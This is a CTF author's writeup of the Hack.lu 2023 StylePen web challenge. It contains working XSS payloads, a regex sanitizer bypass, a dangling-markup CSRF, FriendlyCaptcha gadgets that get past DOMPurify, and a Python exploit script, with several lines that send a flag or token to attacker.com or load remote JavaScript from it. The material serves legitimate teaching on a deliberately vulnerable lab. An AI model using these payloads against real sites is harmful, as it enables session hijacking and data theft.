Hacklu CTF 2023 — StylePen Writeup

Last weekend, my CTF team FluxFingers hosted our yearly Hack.lu CTF. I had a lot of fun preparing challenges and watching the participants find unique and unforeseen solutions to them. This year, I made two challenges:

Safest Eval, a misc Python Jail challenge. You can read an excellent writeup by rebane2001 about it.
StylePen, a web XSS challenge. You’re reading the writeup about it right now ;).

If you want to play any of my challenges before reading on, check out the challenges page!

The StylePen competition

StylePen (no affiliation with codepen.io) hosted a Spooktober CSS competition. On the site, you could submit an HTML/CSS snippet with a spooky animation to win. In the editor, you could edit the snippet and directly see the result on the page, after it was sanitized by DOMPurify. The code was also synced with the URL hash. Before submitting, you had to solve a proof-of-work-based JS captcha, courtesy of FriendlyCaptcha. In XSS challenges with a Chrome bot, captchas usually just protect the infrastructure from melting down. But later on, we will see that this captcha was actually at the center of this challenge. I expected a lot of players to miss this because of their previous XSS challenge experiences 😈.

After submission, a “rater” bot would view the rendered snippet on /view.php?id={randomid}. This page used a custom server-side sanitizer, Cleaner.php. All pages except /index.php, including this one, have the CSP script-src 'self' 'wasm-unsafe-eval'. The rater bot also has access to an additional endpoint, /submit-admin.php, which sends an arbitrary link to the admin bot. Only the admin bot had permission to view the random ID of the flag.

Knowing the setup, we can formulate a three-step plan:

Submit HTML which bypasses Cleaner.php on /view.php
Use the HTML injection on /view.php to make the rater submit a link to the admin bot via /submit-admin.php
Send the admin bot to /index.php#{HTML} with HTML that bypasses DOMPurify and gets XSS as admin

1. Bypassing `Cleaner.php`

The server-side sanitizer Cleaner.php uses the DOMDocument::loadHTML() API of PHP. The docs page has an interesting warning about the API using HTML4 internally, which could lead to parsing differentials with browsers which use HTML5. Because I’m nice, no parsing differential or other complex bypass was needed: The sanitizer is just bad 🙃. Let’s look closer at the sanitize() function:

public function sanitize(string $dom_content, array $options = []): string
{
  // ... [1]
  $document = $this->loadDocument($dom_content);
  // ... [2]
  for ($i = $elements->length; --$i >= 0;) {
    $element = $elements->item($i);
    $tag_name = $element->tagName;
    if (in_array(strtolower($tag_name), $tags)) {
      for ($j = $element->attributes->length; --$j >= 0;) {
        $attr_name = $element->attributes->item($j)->name;
        $attr_value = $element->attributes->item($j)->textContent;
        if ((!in_array(strtolower($attr_name), $attributes) && !$this->isSpecialCase($attr_name)) ||
          $this->isExternalUrl($attr_value)
        ) {
          $element->removeAttribute($attr_name);
        }
      }
    } else {
      $element->parentNode->removeChild($element);
    }
  }
  // [3]
  $output = $this->saveDocument($document);
  // [4]
  $output = $this->regexCleaning($output);
  if ($options['remove-html-tags']) {
    $output = preg_replace(self::HTML_TAGS, '', $output);
  }
  if ($options['remove-xml-tags']) {
    $output = preg_replace(self::XML_TAGS, '', $output);
  }
  // ...
  return trim($output);
}

[1] The HTML string is parsed into a DOM with DOMDocument::loadHTML().
[2] All tags / attributes in the DOM are checked against an allowlist.
[3] The resulting DOM is stringified again.
[4] The new HTML string is cleaned with additional regexes and returned as clean.
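The weak spot is the hand-off between the DOM-based allowlist and the string-based regex pass: the allowlist loop only visits elements, so anything inside an HTML comment is never checked, yet it is still present in the string the regexes rewrite afterwards. A minimal sketch of that blind spot, assuming Python's html.parser as a stand-in for DOMDocument (the two parsers differ in many details, but both report a comment as a comment and not as the tags it contains):

```python
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Record what a DOM-style allowlist pass would get to inspect."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []      # element names: the only thing an allowlist loop checks
        self.comments = []  # comment bodies: never checked by the allowlist

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_comment(self, data):
        self.comments.append(data)


payload = 'a href="javascript: <!-- " <img src onerror=alert()> -->'
collector = TagCollector()
collector.feed(payload)
collector.close()
print(collector.tags)      # no elements at all: the <img> is not a tag for the parser
print(collector.comments)  # the <img> only exists as comment text
```

The allowlist therefore has nothing to remove; whether the `<img>` becomes live markup is decided later, purely by string manipulation.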

Regex cleaning performed on an HTML string is often buggy, so let’s take a look at all the regexes used at this stage:

const JAVASCRIPT_ATTR = "/(\s(?:href|xlink\:href)\s*=\s*\"javascript:.*\")/i";
const SNEAKY_ONLOAD = "/(\s(?:href|xlink\:href)\s*=\s*\"data:.*onload.*\")/i";
const HTML_TAGS = "~<(?:!DOCTYPE|/?(?:html|body))[^>]*>\s*~i";
const XML_TAGS = '/<\?xml.*\?>/i';

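All regexes except HTML_TAGS contain a greedy .*, which can match across the boundaries between different contexts: an HTML tag and an attribute, HTML and a style block, or HTML and an HTML comment. Removing such a match removes the boundary as well. Since the allowlist pass only inspects elements, whatever sits inside a comment survives it untouched, and JAVASCRIPT_ATTR can then strip the comment opener to reveal it. Note that . does not match newlines here, so this part of the payload has to stay on one line.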

<!-- before regex: -->
a href="javascript: <!-- " <img src onerror=alert()> -->
<!-- after regex: -->
a <img src onerror=alert()> -->
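To check the regex step offline, JAVASCRIPT_ATTR can be transcribed to Python's re module; for this pattern, the greedy .* and the "dot does not match a newline" default behave the same as in PHP's PCRE. This sketch applies it to the comment payload and also shows why the payload must stay on one line. The leftover a is just harmless text.

```python
import re

# JAVASCRIPT_ATTR from Cleaner.php, transcribed to Python's re syntax
JAVASCRIPT_ATTR = re.compile(r'(\s(?:href|xlink\:href)\s*=\s*"javascript:.*")', re.IGNORECASE)

before = 'a href="javascript: <!-- " <img src onerror=alert()> -->'
# The greedy .* runs to the last " on the line, so the match swallows the comment opener
after = JAVASCRIPT_ATTR.sub("", before)
print(after)  # a <img src onerror=alert()> -->

# With a newline before the closing quote, . cannot reach it and nothing is removed
multi_line = 'a href="javascript: <!--\n" <img src onerror=alert()> -->'
print(JAVASCRIPT_ATTR.sub("", multi_line) == multi_line)  # True
```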

2. Submitting a link to the admin bot

The view.php page with this injection has the CSP script-src 'self' 'wasm-unsafe-eval', so inline scripts and event handlers won’t run and we have to get creative. Submitting an arbitrary link can only be done by the rater bot and requires a CSRF token. There’s an obvious approach that everyone took, and then there’s the intended solution, which wasn’t required because I forgot to block the obvious one (feel free to skip that part if you’re not interested).
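To see why this CSP rules out a plain injected script, here is a deliberately simplified model of how script-src 'self' 'wasm-unsafe-eval' treats the kinds of script we might inject. The helper script_allowed is hypothetical and ignores nonces, hashes, 'strict-dynamic' and the other details of real CSP matching; it only captures that inline code needs 'unsafe-inline' and that 'self' admits same-origin script URLs.

```python
from typing import Optional
from urllib.parse import urljoin, urlsplit

VIEW_PHP_SCRIPT_SRC = ["'self'", "'wasm-unsafe-eval'"]


def script_allowed(script_src: list, page_url: str, script_url: Optional[str]) -> bool:
    """Simplified script-src check (hypothetical helper, not a full CSP implementation).

    script_url=None models inline code: <script> bodies and on* event handlers.
    """
    if script_url is None:
        return "'unsafe-inline'" in script_src
    if "'self'" in script_src:
        page = urlsplit(page_url)
        script = urlsplit(urljoin(page_url, script_url))
        # 'self' matches the page's own scheme and host (including port)
        if (page.scheme, page.netloc) == (script.scheme, script.netloc):
            return True
    # 'wasm-unsafe-eval' only permits compiling WebAssembly; it never admits a script
    return False


page = "https://stylepen.flu.xxx/view.php?id=f00"
print(script_allowed(VIEW_PHP_SCRIPT_SRC, page, None))                            # False
print(script_allowed(VIEW_PHP_SCRIPT_SRC, page, "/static/app.js"))                # True
print(script_allowed(VIEW_PHP_SCRIPT_SRC, page, "https://attacker.com/evil.js"))  # False
```

Only scripts already hosted on the challenge origin can run, which is why the rest of this step is about reusing existing same-origin scripts as gadgets.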

The obvious approach: meta tag redirect

The (in hindsight) obvious approach that every solving team used is simply injecting a meta tag redirect to /index.php, which does not have a CSP. This page accepts any HTML in the URL hash and renders it after DOMPurify sanitization. From there, read the CSRF token and submit the final payload to the admin bot. The plain onerror handler below is only for readability: to actually run on /index.php, it has to be wrapped in a DOMPurify bypass (see step 3).

<meta http-equiv='refresh' content='0;/#<img src onerror="csrf=document.querySelector(`[name=csrf]`).value;
fetch(`/submit-admin.php`, {method: `POST`, 
body: `csrf=${csrf}&url=https://stylepen.flu.xxx/#${payload to steal flag}`})">'>

The intended solution: captcha and dangling markup

I wanted to write a challenge which required a scriptless attack but also had a page without CSP. I knew that people could bypass the scriptless attack by just using the meta redirect shown above. That’s why I included two bots with different accounts, which in theory should have only had access to one injection page each. But while implementing the challenge a few days (and nights) before the CTF, I simply forgot to enforce that. So let’s pretend for a moment that redirects to /index.php are blocked for the rater bot. What can still be done?

We can still live off the land: load existing scripts from the server, which 'self' allows, and look for gadgets in them. The captcha I alluded to earlier is one of those gadgets. Once its script is loaded, the widget renders itself automatically into any div with specific attributes on the page.

<script src="/static/widget.module.min.js"></script>
<div class="frc-captcha" data-sitekey="FOOBAR"></div>

After reading the docs of FriendlyCaptcha, we’ll find that this is more useful than it seems: the data-callback attribute names a function that is called once the captcha puzzle is successfully solved. The data-start="auto" attribute starts solving as soon as the captcha is loaded. And since the captcha task is a hash-based proof of work and not a “click five red cars” task, the whole thing runs automatically on the rater bot’s page. To make sure the captcha runs correctly on the page, wasm-unsafe-eval is included in the CSP ;).

<script src="/static/widget.module.min.js"></script>
<div class="frc-captcha" data-sitekey="REALSITEKEY" data-start="auto" data-callback="alert"></div>
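Why no human is needed: a hash-based proof of work is just a loop that any headless browser runs to completion. The following is a generic hashcash-style sketch; the blake2b hash, nonce encoding and difficulty parameter are assumptions for illustration and do not reproduce FriendlyCaptcha’s actual puzzle format.

```python
import hashlib
import itertools


def pow_hash(challenge: bytes, nonce: int) -> int:
    """Hash challenge || nonce and read the 32-byte digest as a big-endian integer."""
    digest = hashlib.blake2b(challenge + nonce.to_bytes(8, "little"), digest_size=32).digest()
    return int.from_bytes(digest, "big")


def solve(challenge: bytes, difficulty_bits: int) -> int:
    """Brute-force the first nonce whose hash has `difficulty_bits` leading zero bits."""
    target = 1 << (256 - difficulty_bits)
    for nonce in itertools.count():
        if pow_hash(challenge, nonce) < target:
            return nonce
    raise AssertionError("unreachable: itertools.count() never ends")


def verify(challenge: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Checking a solution costs a single hash, while finding one costs ~2**difficulty_bits."""
    return pow_hash(challenge, nonce) < (1 << (256 - difficulty_bits))


nonce = solve(b"hypothetical-puzzle", 8)
print(nonce, verify(b"hypothetical-puzzle", nonce, 8))
```

The asymmetry is the point of such captchas: cheap to check for the server, a few seconds of CPU for the client, and no interaction at all, so data-start="auto" plus data-callback turns it into a fully automatic trigger.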

Now we can call arbitrary functions on the page, but without control over the arguments. How is that useful? Coincidentally, app.js contains the sendSubmissionForm() function. This function submits the form with id submission-form if it contains a captcha-solution input. Combining this function with the captcha callback gadget, we can submit any form on the page that has this id.

The existing form has the wrong id and url, but it contains the CSRF token. To use the token in our own POST request, we can use dangling markup injection. We start our own form tag with the correct id and our payload url to be sent to the admin bot. At the end, we open a div with an attribute value that starts with a single quote but is never closed. All HTML after that, up to the next single quote, is swallowed into the attribute value and never parsed as markup. Note the convenient single quote in the button text (contestant's): the original url input and the page’s own form tag end up inside the attribute, while the csrf input after the quote is parsed normally and becomes part of our form.

<form id="submission-form" method="POST" action="/submit-admin.php">
  <input name="url" value="https://stylepen.flu.xxx/#{payload to steal flag}">
  <div foo='

          </div>
        </div>
    </div>
</section>
<section>
    <div class="grid">
        <form method="POST" action="/submit_admin.php">
            <input type="hidden" name="url" value="https://stylepen.flu.xxx/view.php?id=f00">
            <button type="submit">Recommend contestant's submission</button>
            <input type="hidden" name="csrf" value="abcd1337">
        </form>
        <div></div>
    </div>
</section>
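The split can be approximated at the string level: once the tokenizer is inside a single-quoted attribute value, it consumes everything up to the next single quote. This sketch models only that rule (split_at_dangling_quote is a hypothetical helper, not a full HTML tokenizer) on an abridged copy of the page markup above.

```python
# Markup the page emits after our injection point (abridged from the example above)
PAGE_REST = """
          </div>
        </div>
    </div>
</section>
<section>
    <div class="grid">
        <form method="POST" action="/submit_admin.php">
            <input type="hidden" name="url" value="https://stylepen.flu.xxx/view.php?id=f00">
            <button type="submit">Recommend contestant's submission</button>
            <input type="hidden" name="csrf" value="abcd1337">
        </form>
"""


def split_at_dangling_quote(rest: str) -> tuple:
    """Our injection ends inside foo='..., so the value runs until the next single quote."""
    end = rest.index("'")
    return rest[:end], rest[end + 1:]


swallowed, still_parsed = split_at_dangling_quote(PAGE_REST)
print('name="url"' in swallowed)      # True: the original url input is hidden in the attribute
print("<form" in swallowed)           # True: so is the page's own <form> start tag
print('name="csrf"' in still_parsed)  # True: the csrf input is parsed as a real element
```

In a browser, the leftover s submission</button> right after the quote is consumed as junk attribute names on our div until the next >, so the csrf input that follows is the first real element and joins the still-open submission-form.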

Combining this technique with the captcha form submission gadget, we get this step 2 payload:

<form id=submission-form action=/submit-admin.php method=POST>
  <div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div>
  <input name=url value=https://stylepen.flu.xxx/#payload>
  <script src=/static/widget.module.min.js></script>
  <script src=/static/app.js></script>
  <div class='

An alternative approach some teams used: sending the CSRF token to their own server, which then serves a POST CSRF page to the bot. This works because the HTML parser ignores a form start tag nested inside an already open form, so the page’s inputs, including the CSRF token, end up in the outer, attacker-controlled form (and because SameSite cookie restrictions aren’t in effect). This approach does not need the single quote dangling markup injection.

<form id=submission-form action=https://attacker.com/csrf method=POST>
  <div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div>
  <script src=/static/widget.module.min.js></script>
  <script src=/static/app.js></script>
...
  <form method="POST" action="/submit_admin.php"> <!-- this form action is ignored -->
      <input type="hidden" name="url" value="https://stylepen.flu.xxx/view.php?id=f00">
      <button type="submit">Recommend contestant's submission</button>
      <input type="hidden" name="csrf" value="abcd1337"> <!-- stolen to attacker.com -->
  </form>
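A minimal sketch of such an attacker server, using only Python’s standard library. It assumes the hypothetical https://attacker.com/csrf endpoint from the snippet above is routed to this handler, and ADMIN_TARGET is a placeholder for the step 3 payload URL; the handler reads the forwarded csrf field and answers with an auto-submitting form that replays it against /submit-admin.php.

```python
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

ORIGIN = "https://stylepen.flu.xxx"
ADMIN_TARGET = ORIGIN + "/#PAYLOAD"  # placeholder: the step 3 DOMPurify bypass goes here


def token_from_body(body: bytes) -> str:
    """Pull the csrf field out of the form-encoded POST the rater bot sends us."""
    fields = parse_qs(body.decode())
    return fields.get("csrf", [""])[0]


def csrf_page(token: str, url: str) -> str:
    """Auto-submitting page that replays the stolen token against /submit-admin.php."""
    return (
        f'<form id=f method=POST action="{ORIGIN}/submit-admin.php">'
        f'<input type=hidden name=csrf value="{html.escape(token)}">'
        f'<input type=hidden name=url value="{html.escape(url)}">'
        "</form><script>document.getElementById('f').submit()</script>"
    )


class CsrfHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        token = token_from_body(self.rfile.read(length))
        body = csrf_page(token, ADMIN_TARGET).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port: int = 8000) -> None:
    """Start the listener; not called automatically."""
    HTTPServer(("", port), CsrfHandler).serve_forever()
```

Call serve() behind whatever TLS-terminating host attacker.com points to. The extra fields in the forwarded form (the original url, captcha-solution) are simply ignored.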

3. Bypassing DOMPurify

With steps 1 and 2, we can send the admin bot to /index.php, where there’s no CSP. But this page uses DOMPurify, a competent sanitizer. So to steal the flag, we need a script gadget: markup that DOMPurify lets through but that a script on the page turns into code execution. This is where the FriendlyCaptcha widget comes in (again). The widget is rendered automatically into all elements with class="frc-captcha", and it uses the data attributes of those elements unsafely, while DOMPurify keeps class and data-* attributes by default. We have to delve into the source code a bit, where we’ll find a plethora of gadgets. It was really cool to see the different gadgets found by the teams:

The FriendlyCaptcha widget is constructed with basic HTML string interpolation and assignment to innerHTML. This can be abused with several of the exposed data attributes. I used the data-solution-field-name attribute, which gets rendered directly when the captcha loads:

<div class="frc-captcha" data-solution-field-name='"><img src onerror=alert()>'></div>
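The underlying bug class is attribute breakout through unescaped interpolation. This sketch uses a hypothetical template (not FriendlyCaptcha’s exact markup) to show what the string handed to innerHTML looks like with the attribute value from above, and how escaping would have neutralized it.

```python
import html


def render_solution_field(field_name: str, escape: bool) -> str:
    """Hypothetical widget template built by string interpolation, as fed to innerHTML."""
    value = html.escape(field_name) if escape else field_name
    return f'<input name="{value}" type="hidden">'


# Value of data-solution-field-name once the single-quoted attribute is parsed
attacker_value = '"><img src onerror=alert()>'

print(render_solution_field(attacker_value, escape=False))
# <input name=""><img src onerror=alert()>" type="hidden">
print(render_solution_field(attacker_value, escape=True))
# <input name="&quot;&gt;&lt;img src onerror=alert()&gt;" type="hidden">
```

DOMPurify only sees the harmless div with a data attribute; the dangerous markup is created afterwards by the widget, outside the sanitizer’s view.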

I also saw someone using the data-puzzle-endpoint attribute, combined with data-start="auto". This will immediately try to load a puzzle from the specified API endpoint. If that fails, an error message containing the raw endpoint “URL” is displayed and leads to XSS:

<div class="frc-captcha" data-start="auto"
  data-puzzle-endpoint="<img src onerror=alert()>"></div>

But by far the coolest gadget was one not involving HTML templating. Readers of the intended solution section above already know the data-callback attribute: the function named in the attribute gets called with the captcha solution as the first parameter. Interestingly, the solution includes the original challenge string from the captcha server. And with the data-puzzle-endpoint attribute, we can set the captcha server to our own server 🤔. Do you see where this is going? We can set eval as the data-callback and our own server as the data-puzzle-endpoint. Our server returns a puzzle that contains JS and a real puzzle grabbed from the normal captcha server, separated by a dot. The trailing // turns everything after the JS into a comment when eval() runs the solution string. The captcha internally splits by dots, so we can’t use dots in our JS payload, but that shouldn’t be a problem for you if you got this far.

<div class="frc-captcha" data-start="auto" data-callback="eval"
  data-puzzle-endpoint="https://attacker.com/puzzle"></div>

{"data": {"puzzle": "import('https://attacker\\x2ecom/stealFlagJS')//.c9fbcfeb5187a9ae56ebc61acd12b6e4.ZTeuWWRQVe02S/WpAQwzegAAAAAAAAAAEjmV2KsP2Dk="}}
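The response body can be generated rather than hand-written. A minimal sketch, assuming the real puzzle string has already been fetched from the genuine captcha API (that request is not shown) and using a hypothetical helper name; it enforces the dot-free payload rule and lets json.dumps handle escaping.

```python
import json


def malicious_puzzle_response(js_payload: str, real_puzzle: str) -> str:
    """Build the puzzle endpoint's JSON: JS payload + '//' + '.' + a genuine puzzle.

    The widget splits the puzzle on '.', so the JS part itself must be dot-free.
    """
    if "." in js_payload:
        raise ValueError(r"payload must not contain '.'; write \x2e inside JS strings instead")
    return json.dumps({"data": {"puzzle": f"{js_payload}//.{real_puzzle}"}})


payload = r"import('https://attacker\x2ecom/stealFlagJS')"
real = "c9fbcfeb5187a9ae56ebc61acd12b6e4.ZTeuWWRQVe02S/WpAQwzegAAAAAAAAAAEjmV2KsP2Dk="
print(malicious_puzzle_response(payload, real))
```

json.dumps escapes the backslash, so the JSON parser hands the widget a literal \x2e, and only the JS engine, when eval() runs, turns it into a dot.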

The final payload + conclusion

Combining all 3 steps, with some horrible URL encoding, we get this final payload. It uses the intended solution instead of the meta redirect and exfiltrates the ID of the flag to attacker.com:

a href="javascript: <!-- "<form id=submission-form action=/submit-admin.php method=POST><div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div><input name=url value=https://stylepen.flu.xxx/#%3Cdiv%20class%3D%22frc-captcha%22%20data-solution-field-name%3D%27%22%3E%3Cimg%20src%20onerror%3D%22%28async%20%28%29%20%3D%3E%20%7Blet%20res%20%3D%20await%20%28await%20fetch%28%60/admin.php%60%29%29.text%28%29%3Blet%20dom%20%3D%20new%20DOMParser%28%29.parseFromString%28res%2C%20%60text/html%60%29%3Blet%20link%20%3D%20dom.querySelector%28%60a%5Brole%3D%5Cx22button%5Cx22%5D%60%29%3Bfetch%28%60https%3A//attacker.com%3Fflag%3D%24%7Blink.href%7D%60%29%3B%7D%29%28%29%22%3E%27%3E%3C/div%3E%0A><script src=/static/widget.module.min.js></script><script src=/static/app.js></script><div class=' -->

The exploit script, a bit more readable:

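from urllib.parse import quote

EXFIL_SERVER = "https://attacker.com"
ORIGIN = "https://stylepen.flu.xxx"

# Steps 1 + 2: HTML comment revealed by the JAVASCRIPT_ATTR regex on /view.php.
# The captcha callback calls sendSubmissionForm(), which submits SECOND to /submit-admin.php.
first = """a href="javascript: <!-- "<form id=submission-form action=/submit-admin.php method=POST><div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div><input name=url value=SECOND><script src=/static/widget.module.min.js></script><script src=/static/app.js></script><div class=' -->"""
# Step 3: DOMPurify-safe FriendlyCaptcha gadget on /index.php that runs THIRD as the admin.
second = """<div class="frc-captcha" data-solution-field-name='"><img src onerror="THIRD">'></div>"""
# THIRD: read the flag link from /admin.php and send it to EXFIL_SERVER.
# Raw string, so \x22 stays a JS escape instead of becoming a literal " that would close onerror="...".
third = r"""(async () => {
let res = await (await fetch(`/admin.php`)).text();
let dom = new DOMParser().parseFromString(res, `text/html`);
let link = dom.querySelector(`a[role=\x22button\x22]`);
fetch(`EXFIL_SERVER?flag=${link.href}`);
})()"""
third = third.replace("EXFIL_SERVER", EXFIL_SERVER)
# Flatten the JS onto one line before embedding it in the onerror attribute
second = second.replace("THIRD", third.replace("\n", ""))
# URL-encode step 3 so it fits into the unquoted value= attribute of the url input
payload = first.replace("SECOND", f"{ORIGIN}/#{quote(second)}")

print("Submit payload manually because of captcha and receive flag link at your server\n")
print(payload)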

I hope you had fun playing and / or learned something new while reading this, same as I had fun and learned more reading your exploits in the DB logs 😁. See you next year for Hack.lu CTF 2024!